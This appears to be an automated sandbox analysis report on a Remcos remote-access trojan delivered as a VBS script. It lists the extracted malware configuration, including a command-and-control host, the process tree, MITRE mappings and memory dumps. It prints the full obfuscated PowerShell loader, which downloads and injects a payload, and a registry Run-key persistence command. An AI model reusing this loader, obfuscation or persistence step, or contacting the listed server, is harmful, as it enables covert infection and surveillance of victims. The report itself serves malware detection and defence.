Overview

overview

10

Static

static

1

Stningsupf.vbs

windows7-x64

8

Stningsupf.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    53s
  • max time network
    57s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-01-2024 09:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Stningsupf.vbs

  • Size

    20KB

  • MD5

    5529cd44f2c094c191a17229e665309c

  • SHA1

    0ada61210700fa1c500c175f077e816b3b4e8d5e

  • SHA256

    deaba7a864c44913637d6e989f0a0d08e938259eafd787111be67c0e7bd310cf

  • SHA512

    c15bad22c731839d23b67afec0588d9ebc613d06e48842c1c781ee7e46ca5aa5b3256126cc31b82ee0b019117b88ff93bb23360930c864c36de9904fb9bb10bd

  • SSDEEP

    384:d8/BPgKFRKYo9cAgwDRFO/DCu1pnrv97hfC2t5r/Xra:+EptgvG0Fl7pCwr/Xu

Score
10/10
remcos2024persistencerat

Malware Config

Extracted

Family

remcos

Botnet

2024

C2

onyezeshedy1122.ddns.net:6524

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-4ZMXL4

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Stningsupf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sviger Ethn Korros Torden Nrtbesl Delilahch #>;Function spidgermac ([String]$Trykluf120){$Nstenfljt=8;$unhandi=Sekundave4($Trykluf120);For($Ansttel79=7; $Ansttel79 -lt $unhandi; $Ansttel79+=$Nstenfljt){$Sekundave=$Sekundave+$Trykluf120.Substring($Ansttel79, 1)};$Sekundave;}function Fornjels ($Strut){& ($Sekundave01) ($Strut);}function Sekundave4 ([String]$Valen){$homoousio1=$Valen.Length-1;$homoousio1;}$Sekundave02=spidgermac ' LalopaTRensemir PartreaCoopeesnFragmensStngeshfGrdimyre Thrombr Uropodr ToldtiiManifesn MeadebgDeferri ';$Bipolari=spidgermac 'EylevsbhHulkorttHjemmestGuanosbpFodgngesBrygger:Opvarmn/Termina/ expliccUnconcedMonicesn Freshe.UninstidReificeiSumarghsReiniticObserveoPresterrvgtafgiddilectiaOxyhydrpAksellepBaandsp.negativc Toggero Scufflm Ovalbr/kternela KalifatSkattegtNattevaaEntalsfcmicroplhWantwitm Inexcle MetaltnNonionitDihydrosCompani/ Revali1 Elychn1Tugthus9Buninge9Lynchen4Smaatte6Drenges4Shivare8Knsroll2Sirdars3Piggede7Knogles3Claimsm0Lakarpi2Transum1Resuppr2Vuggens9Bombnin5Katastr8Pegefin/Dekaedr1Streamw1Uranice9Toldpos9 aftera4Frimrke8Synocho3 Gaster6Litoral6Accente8Underst5Pattern4Competi0Fauvism9Procure6Lagerbe0Twinshi9Beamsma3Indiscr8Disarra/RheotacGFadykrylMarinusaAcrologn QuinzisForhindlEightba.HyrennosHumanisn Afspejp Taxine?BihulebeMdewakaxPatriar=Rasbora6Moesgaa5GrimiercBenefic2TroakfybFletkom5Pacific3Nursery7Satirem&TraumatiConcamesAntiref= Progra6 Headpi5Beskyttbinclina0Alpinis4 Ungdom0Forraak3Gkanter7anisett& SpndethPierianmForhale=Aflgnin0StriolabSenecio7 Udlaan9 Earthd0FabriksbTenantb8 Tobogg0RabificeFrednin9 Irradi4 EftergdStersby1berebde1Ghegbun4Jenbryn4OmviseodRosenka1 Betryg3indefryb Unjudid Annikkbschweiza Remark6Plesios8Unconti0Nationa8UnaugmebPaasatt5Ketimidd FluoroaNatrium6Perpets6Underme7 Tuteesa Vallid0Radioac5Puberte0MarshlocJournal1InorgklcSkraalsbForeboaeInviola3carbona7Filiati7Akroter0 Beggar4 Kunsth8EnogtyvcSammmen5hngebro9cigarru4Excesse7 Refere8 Unpassaeffulge9SubdivicKanvasebGalacto8 Broder8Sciroph5Sladret7 Bindemd Bondek&Selskab ';$Sekundave01=spidgermac 'KonkurriChanneleForevigxprodukt ';$Sekundave00=spidgermac 'Babbitt$germicigStenocelFleuretoRoverssbSuperreaSelvindl Candle: EconomhUdviklioreboantmgardieroOctoniooButterfu LetsinsEmbryoli FlutteoMicrowo8 Dbersb Klapsto= Lazyis KonfuseSNonchaltReklameaCubanerr Hortent Hemihy- BardieBDecilliiTilflditVersionsNotocorTFugtigerAvyayibaShuntven MetonysTvangsafBondedaeStrengerOptimer Sondre- KontroSJoneskooServiceuWreathwrWeepiescElectroeVeksele incrass$ TankreB TaaregiKrlighepPleuraloHypsiprlHuffinga UropfrrBetelgeiRwandac Dichsan-KrigsreDFarvenuePlanetos SnatchtTopplaciAfgnavnnBgebladaEfterhatStiklemiLeksikooPuncturn Fraskr Aurelia$Rverkbeh StylinoMouthwimReattrio brandsoBiasteru Klumpes Normali BindinoFlgsdis2Tilskdn ';Fornjels (spidgermac 'Foruren$Stokastg ResupplCounteroAntikvibwairepoaNonconslfodbrem:AppresshSennepsoPryskanmFrembreoKolonneo WordliuKrystalsliquidiiEsteresoScallol2Vernill= Overfl$AndaluseChristmn SculptvDemonst:AcheeraaAnabolipSkumtpppsuperevdKritrimaSigfilettermanaaAktioni ') ;Fornjels (spidgermac 'SkyndsoI EmbryomSoonerlpUnverifo EmanuerKlagejet Argusj-DeficitMkrybskyoKildeskdPacificuanretnilLascivieColoniz FrisensBDrejekniGeologetInstrucspestoloTSkingrerleeeconaFjsetsanElefantsAccommof MisnareSemiovar Reprse ') ;$homoousio2=$homoousio2+'\Hard.Bor' ;Fornjels (spidgermac ' Agoniz$ XanthogMisappllTilkastononlibibForaeriaUdkikspl Iridoc:RankernhIrlnderopolonizmHaandtaoDatamato TapetsuParametsTonelejiJrgineeoHistoch7Sociali=Spdbrns(SmagninTFornorse Stormas GrmmedtCraniop-ScalpfoPBilkirka Perpmyt SnyltshOrdmnst Skrmelu$Forsmmeh AmtslioEumoiromBodsticoSystemeo DawtieuHenvejrsDitchwaiThickenoravneag2Urochor)Tilbage ') ;while (-not $homoousio7) {Fornjels (spidgermac 'CockupsIAnsetjafPostkon Profli( Ayahpl$UndersghPerclosoMalevarmSupposioapasttroArvemasuDalersksChinboniSildemaoDelticl8tinerer.NaturlgJTryklaaoJazzparbSubtoweS ScritotForfladaAristoctHeatheneForspil Offeret-OverseneNosedivqfundrai Adsorb$MagttekS StormkePatriotkPolzeniuTatovernTranspodVirksomaDipolarv Heptahe Tephro0 Tackif2Milieum)Jannies Scammon{BevisbySRecontrtStablevaRegionsrSkvadrot Blatan-SlugginS Ricercl Mikrofe RescueePapirinpGrovbla portpa1Seclusi}gastromeDepartml ImpasssamuyongePolemis{ ArchimSPenetrat HarietaPinacolrArchispt Mandor- MisdecSReflekslDyadsveePopelikeMinorshpSammenp kidden1Ridleys;StarycaFOverspro AmazonrTankelsnParadigjVoltanoeRidgesulKloakmesAcrosto Friarly$BalstyrSStedordeMilieurk fferbouSamdrifn AngioldHysteriaBuningevYppersteKonomii0 Opslug0Secrets}Psylliu ');Fornjels (spidgermac 'Centere$PryglssgDrivmidlUncovenoUnremunbpegepinaCubiclelCopable:KystlinhAmortisoBrevvgtmSporobooAntimono KongesuMollashsLiciasriCozygldofejebla7Radikal=Henwinn(SbefabrT Raggybe BagtppsTwankysttepidsa-InterasPAfdelina Interptconsignhnowthef Nonconc$DianthuhAcrasiaoMendedimNedklfroalamiquoUndertiuArsesposTurnbuciCoaliseoBoremas2columni) Udland ') ;}Fornjels (spidgermac 'Knackie$Pendantg Genlstl KapitaoOverhalbVenturea LiverllRekrnke:ViderebREccentre SubmansIntercopIonicda Arfilli=Unenfor UnfixatGGalpevaeAustraltKulegra- CriticC kameluoOtorrhanQuintalt Buestre Tilplan AbstratAnmrkpa Struldb$TargoflhJustervoBaadfrem TurnetoAangstroChickssuIndestas StultiiWeeweecoHummert2Chiffon ');Fornjels (spidgermac 'Halsema$AgregatgEternellBukledeoApostrobHousebaaJerbilll Bellat:VisualiBQuinqueuPaaskyntOverdrii byzonekFortifis DefedadBufferedDomkapik Fljlsg Cerber=Neurops Fladem[AminesaSNimrodiyEncourasWallpapt MissioeKaraktemHyothyr. ReposeC Phleboo AmbulanTrevlervlipothye RefererInterfetMigrain]Forfors:Skoleun:AllegorFmonotrorTwitteroFiskekumUnconceBJademntaKanoners Farvefebrutali6udtagni4SuberizS Indskrt racewarBilligvi Moerkln FidelegEstrade(Fremmel$OverfurRundervue Angliks TeltstpLighten)borehul ');Fornjels (spidgermac 'Rematri$Friktiog NoncodlHobberpoSemialcbSkalainaOverenslSestert:parturiSHinniedeAbstrudk Fejldiu FaldernRutebaadComplotaOvergenvKbspriseheckler2Ulfhild Lnforb=Camelli Bevisma[PrebbleSMatrikuyUfologisGerningtDetestaeUdlseremAggrega.CansereTfattenieBehavioxDisgradtArsenit.TakkelaEAllokernNedarvecKathesvoAmoralid lnstoriMulticanskolealgAdpress] Guldgl:Collogu:NordmarAEnklereSGeneralCAuroralIGnidninIClauses.IntegraGzoologiepandleut TypefoS IndbertBemgtigrGaugeabi QuartenMadsenrgYolkine(buksekn$HaandboBSkinnecuutidssvtSlakedti TransfkVovvovssUnilocudFuguistdIndlggekReackno)Otaries ');Fornjels (spidgermac 'Titular$polyacrgOrphizelHydrogro AdsorbbSkyldstaTonjemalMiljmyn:GodvillSFrontozeSkeernekSputtavu Desmarn NanniedScoonmaa PolenkvBarrioseHjlpeka3Opslide=Calcifo$BeskattSAtomkraeWaltdiskSurahhouTartaranaminosydRytmernaKriminavNationaestenkug2Klagesa.TrykplasVentriluFarthinbCrenelesContorttTraumatr StassaiOveruninOpgavebg Lennyc( Hogger3zizitto1 Barnac5Sleevel0Brstils6Selekti7Unmadde,Rehabil2Prognos4Stikprv5Spaltni3Maffios2 Eleusi)Corriva ');Fornjels $Sekundave3;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Sviger Ethn Korros Torden Nrtbesl Delilahch #>;Function spidgermac ([String]$Trykluf120){$Nstenfljt=8;$unhandi=Sekundave4($Trykluf120);For($Ansttel79=7; $Ansttel79 -lt $unhandi; $Ansttel79+=$Nstenfljt){$Sekundave=$Sekundave+$Trykluf120.Substring($Ansttel79, 1)};$Sekundave;}function Fornjels ($Strut){& ($Sekundave01) ($Strut);}function Sekundave4 ([String]$Valen){$homoousio1=$Valen.Length-1;$homoousio1;}$Sekundave02=spidgermac ' LalopaTRensemir PartreaCoopeesnFragmensStngeshfGrdimyre Thrombr Uropodr ToldtiiManifesn MeadebgDeferri ';$Bipolari=spidgermac 'EylevsbhHulkorttHjemmestGuanosbpFodgngesBrygger:Opvarmn/Termina/ expliccUnconcedMonicesn Freshe.UninstidReificeiSumarghsReiniticObserveoPresterrvgtafgiddilectiaOxyhydrpAksellepBaandsp.negativc Toggero Scufflm Ovalbr/kternela KalifatSkattegtNattevaaEntalsfcmicroplhWantwitm Inexcle MetaltnNonionitDihydrosCompani/ Revali1 Elychn1Tugthus9Buninge9Lynchen4Smaatte6Drenges4Shivare8Knsroll2Sirdars3Piggede7Knogles3Claimsm0Lakarpi2Transum1Resuppr2Vuggens9Bombnin5Katastr8Pegefin/Dekaedr1Streamw1Uranice9Toldpos9 aftera4Frimrke8Synocho3 Gaster6Litoral6Accente8Underst5Pattern4Competi0Fauvism9Procure6Lagerbe0Twinshi9Beamsma3Indiscr8Disarra/RheotacGFadykrylMarinusaAcrologn QuinzisForhindlEightba.HyrennosHumanisn Afspejp Taxine?BihulebeMdewakaxPatriar=Rasbora6Moesgaa5GrimiercBenefic2TroakfybFletkom5Pacific3Nursery7Satirem&TraumatiConcamesAntiref= Progra6 Headpi5Beskyttbinclina0Alpinis4 Ungdom0Forraak3Gkanter7anisett& SpndethPierianmForhale=Aflgnin0StriolabSenecio7 Udlaan9 Earthd0FabriksbTenantb8 Tobogg0RabificeFrednin9 Irradi4 EftergdStersby1berebde1Ghegbun4Jenbryn4OmviseodRosenka1 Betryg3indefryb Unjudid Annikkbschweiza Remark6Plesios8Unconti0Nationa8UnaugmebPaasatt5Ketimidd FluoroaNatrium6Perpets6Underme7 Tuteesa Vallid0Radioac5Puberte0MarshlocJournal1InorgklcSkraalsbForeboaeInviola3carbona7Filiati7Akroter0 Beggar4 Kunsth8EnogtyvcSammmen5hngebro9cigarru4Excesse7 Refere8 Unpassaeffulge9SubdivicKanvasebGalacto8 Broder8Sciroph5Sladret7 Bindemd Bondek&Selskab ';$Sekundave01=spidgermac 'KonkurriChanneleForevigxprodukt ';$Sekundave00=spidgermac 'Babbitt$germicigStenocelFleuretoRoverssbSuperreaSelvindl Candle: EconomhUdviklioreboantmgardieroOctoniooButterfu LetsinsEmbryoli FlutteoMicrowo8 Dbersb Klapsto= Lazyis KonfuseSNonchaltReklameaCubanerr Hortent Hemihy- BardieBDecilliiTilflditVersionsNotocorTFugtigerAvyayibaShuntven MetonysTvangsafBondedaeStrengerOptimer Sondre- KontroSJoneskooServiceuWreathwrWeepiescElectroeVeksele incrass$ TankreB TaaregiKrlighepPleuraloHypsiprlHuffinga UropfrrBetelgeiRwandac Dichsan-KrigsreDFarvenuePlanetos SnatchtTopplaciAfgnavnnBgebladaEfterhatStiklemiLeksikooPuncturn Fraskr Aurelia$Rverkbeh StylinoMouthwimReattrio brandsoBiasteru Klumpes Normali BindinoFlgsdis2Tilskdn ';Fornjels (spidgermac 'Foruren$Stokastg ResupplCounteroAntikvibwairepoaNonconslfodbrem:AppresshSennepsoPryskanmFrembreoKolonneo WordliuKrystalsliquidiiEsteresoScallol2Vernill= Overfl$AndaluseChristmn SculptvDemonst:AcheeraaAnabolipSkumtpppsuperevdKritrimaSigfilettermanaaAktioni ') ;Fornjels (spidgermac 'SkyndsoI EmbryomSoonerlpUnverifo EmanuerKlagejet Argusj-DeficitMkrybskyoKildeskdPacificuanretnilLascivieColoniz FrisensBDrejekniGeologetInstrucspestoloTSkingrerleeeconaFjsetsanElefantsAccommof MisnareSemiovar Reprse ') ;$homoousio2=$homoousio2+'\Hard.Bor' ;Fornjels (spidgermac ' Agoniz$ XanthogMisappllTilkastononlibibForaeriaUdkikspl Iridoc:RankernhIrlnderopolonizmHaandtaoDatamato TapetsuParametsTonelejiJrgineeoHistoch7Sociali=Spdbrns(SmagninTFornorse Stormas GrmmedtCraniop-ScalpfoPBilkirka Perpmyt SnyltshOrdmnst Skrmelu$Forsmmeh AmtslioEumoiromBodsticoSystemeo DawtieuHenvejrsDitchwaiThickenoravneag2Urochor)Tilbage ') ;while (-not $homoousio7) {Fornjels (spidgermac 'CockupsIAnsetjafPostkon Profli( Ayahpl$UndersghPerclosoMalevarmSupposioapasttroArvemasuDalersksChinboniSildemaoDelticl8tinerer.NaturlgJTryklaaoJazzparbSubtoweS ScritotForfladaAristoctHeatheneForspil Offeret-OverseneNosedivqfundrai Adsorb$MagttekS StormkePatriotkPolzeniuTatovernTranspodVirksomaDipolarv Heptahe Tephro0 Tackif2Milieum)Jannies Scammon{BevisbySRecontrtStablevaRegionsrSkvadrot Blatan-SlugginS Ricercl Mikrofe RescueePapirinpGrovbla portpa1Seclusi}gastromeDepartml ImpasssamuyongePolemis{ ArchimSPenetrat HarietaPinacolrArchispt Mandor- MisdecSReflekslDyadsveePopelikeMinorshpSammenp kidden1Ridleys;StarycaFOverspro AmazonrTankelsnParadigjVoltanoeRidgesulKloakmesAcrosto Friarly$BalstyrSStedordeMilieurk fferbouSamdrifn AngioldHysteriaBuningevYppersteKonomii0 Opslug0Secrets}Psylliu ');Fornjels (spidgermac 'Centere$PryglssgDrivmidlUncovenoUnremunbpegepinaCubiclelCopable:KystlinhAmortisoBrevvgtmSporobooAntimono KongesuMollashsLiciasriCozygldofejebla7Radikal=Henwinn(SbefabrT Raggybe BagtppsTwankysttepidsa-InterasPAfdelina Interptconsignhnowthef Nonconc$DianthuhAcrasiaoMendedimNedklfroalamiquoUndertiuArsesposTurnbuciCoaliseoBoremas2columni) Udland ') ;}Fornjels (spidgermac 'Knackie$Pendantg Genlstl KapitaoOverhalbVenturea LiverllRekrnke:ViderebREccentre SubmansIntercopIonicda Arfilli=Unenfor UnfixatGGalpevaeAustraltKulegra- CriticC kameluoOtorrhanQuintalt Buestre Tilplan AbstratAnmrkpa Struldb$TargoflhJustervoBaadfrem TurnetoAangstroChickssuIndestas StultiiWeeweecoHummert2Chiffon ');Fornjels (spidgermac 'Halsema$AgregatgEternellBukledeoApostrobHousebaaJerbilll Bellat:VisualiBQuinqueuPaaskyntOverdrii byzonekFortifis DefedadBufferedDomkapik Fljlsg Cerber=Neurops Fladem[AminesaSNimrodiyEncourasWallpapt MissioeKaraktemHyothyr. ReposeC Phleboo AmbulanTrevlervlipothye RefererInterfetMigrain]Forfors:Skoleun:AllegorFmonotrorTwitteroFiskekumUnconceBJademntaKanoners Farvefebrutali6udtagni4SuberizS Indskrt racewarBilligvi Moerkln FidelegEstrade(Fremmel$OverfurRundervue Angliks TeltstpLighten)borehul ');Fornjels (spidgermac 'Rematri$Friktiog NoncodlHobberpoSemialcbSkalainaOverenslSestert:parturiSHinniedeAbstrudk Fejldiu FaldernRutebaadComplotaOvergenvKbspriseheckler2Ulfhild Lnforb=Camelli Bevisma[PrebbleSMatrikuyUfologisGerningtDetestaeUdlseremAggrega.CansereTfattenieBehavioxDisgradtArsenit.TakkelaEAllokernNedarvecKathesvoAmoralid lnstoriMulticanskolealgAdpress] Guldgl:Collogu:NordmarAEnklereSGeneralCAuroralIGnidninIClauses.IntegraGzoologiepandleut TypefoS IndbertBemgtigrGaugeabi QuartenMadsenrgYolkine(buksekn$HaandboBSkinnecuutidssvtSlakedti TransfkVovvovssUnilocudFuguistdIndlggekReackno)Otaries ');Fornjels (spidgermac 'Titular$polyacrgOrphizelHydrogro AdsorbbSkyldstaTonjemalMiljmyn:GodvillSFrontozeSkeernekSputtavu Desmarn NanniedScoonmaa PolenkvBarrioseHjlpeka3Opslide=Calcifo$BeskattSAtomkraeWaltdiskSurahhouTartaranaminosydRytmernaKriminavNationaestenkug2Klagesa.TrykplasVentriluFarthinbCrenelesContorttTraumatr StassaiOveruninOpgavebg Lennyc( Hogger3zizitto1 Barnac5Sleevel0Brstils6Selekti7Unmadde,Rehabil2Prognos4Stikprv5Spaltni3Maffios2 Eleusi)Corriva ');Fornjels $Sekundave3;"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2780
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          4⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:2636
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hovedst" /t REG_EXPAND_SZ /d "%Undi112% -w 1 $Henotic=(Get-ItemProperty -Path 'HKCU:\Tronbefrie110\').Nord;%Undi112% ($Henotic)"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5036
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hovedst" /t REG_EXPAND_SZ /d "%Undi112% -w 1 $Henotic=(Get-ItemProperty -Path 'HKCU:\Tronbefrie110\').Nord;%Undi112% ($Henotic)"
              6⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:1132

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

2
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jm513kad.ifn.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit
  • memory/2616-4-0x000001E682260000-0x000001E682282000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2616-14-0x00007FFF9A6B0000-0x00007FFF9B171000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2616-16-0x000001E69A850000-0x000001E69A860000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2616-15-0x000001E69A850000-0x000001E69A860000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2616-17-0x000001E69CD40000-0x000001E69CD66000-memory.dmp
    Filesize

    152KB

    Download
  • memory/2616-18-0x000001E69CD70000-0x000001E69CD84000-memory.dmp
    Filesize

    80KB

    Download
  • memory/2616-47-0x000001E69A850000-0x000001E69A860000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2616-46-0x00007FFF9A6B0000-0x00007FFF9B171000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2616-76-0x00007FFF9A6B0000-0x00007FFF9B171000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2636-81-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-88-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-85-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-84-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-83-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-87-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-56-0x0000000000AA0000-0x0000000002285000-memory.dmp
    Filesize

    23.9MB

    Download
  • memory/2636-80-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-79-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-78-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-77-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-86-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-75-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-72-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-71-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-89-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-90-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-70-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-69-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-66-0x0000000000AA0000-0x0000000002285000-memory.dmp
    Filesize

    23.9MB

    Download
  • memory/2636-64-0x00000000777E1000-0x0000000077901000-memory.dmp
    Filesize

    1.1MB

    Download
  • memory/2636-63-0x000000006F2C0000-0x0000000070514000-memory.dmp
    Filesize

    18.3MB

    Download
  • memory/2636-59-0x00000000777E1000-0x0000000077901000-memory.dmp
    Filesize

    1.1MB

    Download
  • memory/2636-58-0x0000000077868000-0x0000000077869000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2780-36-0x00000000061B0000-0x00000000061CE000-memory.dmp
    Filesize

    120KB

    Download
  • memory/2780-57-0x0000000008B40000-0x000000000A325000-memory.dmp
    Filesize

    23.9MB

    Download
  • memory/2780-55-0x00000000777E1000-0x0000000077901000-memory.dmp
    Filesize

    1.1MB

    Download
  • memory/2780-54-0x0000000004CF0000-0x0000000004D00000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2780-53-0x0000000004CF0000-0x0000000004D00000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2780-51-0x0000000074DC0000-0x0000000075570000-memory.dmp
    Filesize

    7.7MB

    Download
  • memory/2780-50-0x0000000008B40000-0x000000000A325000-memory.dmp
    Filesize

    23.9MB

    Download
  • memory/2780-67-0x0000000074DC0000-0x0000000075570000-memory.dmp
    Filesize

    7.7MB

    Download
  • memory/2780-68-0x0000000008B40000-0x000000000A325000-memory.dmp
    Filesize

    23.9MB

    Download
  • memory/2780-49-0x0000000008B40000-0x000000000A325000-memory.dmp
    Filesize

    23.9MB

    Download
  • memory/2780-48-0x00000000078C0000-0x00000000078C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2780-45-0x00000000076A0000-0x00000000076B4000-memory.dmp
    Filesize

    80KB

    Download
  • memory/2780-44-0x0000000007600000-0x0000000007622000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2780-43-0x0000000008590000-0x0000000008B34000-memory.dmp
    Filesize

    5.6MB

    Download
  • memory/2780-42-0x00000000073A0000-0x00000000073C2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2780-41-0x0000000007410000-0x00000000074A6000-memory.dmp
    Filesize

    600KB

    Download
  • memory/2780-40-0x0000000007310000-0x000000000732A000-memory.dmp
    Filesize

    104KB

    Download
  • memory/2780-39-0x0000000007960000-0x0000000007FDA000-memory.dmp
    Filesize

    6.5MB

    Download
  • memory/2780-38-0x0000000004CF0000-0x0000000004D00000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2780-37-0x00000000061F0000-0x000000000623C000-memory.dmp
    Filesize

    304KB

    Download
  • memory/2780-35-0x0000000005B50000-0x0000000005EA4000-memory.dmp
    Filesize

    3.3MB

    Download
  • memory/2780-25-0x0000000005A60000-0x0000000005AC6000-memory.dmp
    Filesize

    408KB

    Download
  • memory/2780-24-0x0000000005280000-0x00000000052E6000-memory.dmp
    Filesize

    408KB

    Download
  • memory/2780-23-0x00000000051D0000-0x00000000051F2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2780-22-0x0000000005330000-0x0000000005958000-memory.dmp
    Filesize

    6.2MB

    Download
  • memory/2780-21-0x0000000004CF0000-0x0000000004D00000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2780-20-0x0000000004C00000-0x0000000004C36000-memory.dmp
    Filesize

    216KB

    Download
  • memory/2780-19-0x0000000074DC0000-0x0000000075570000-memory.dmp
    Filesize

    7.7MB

    Download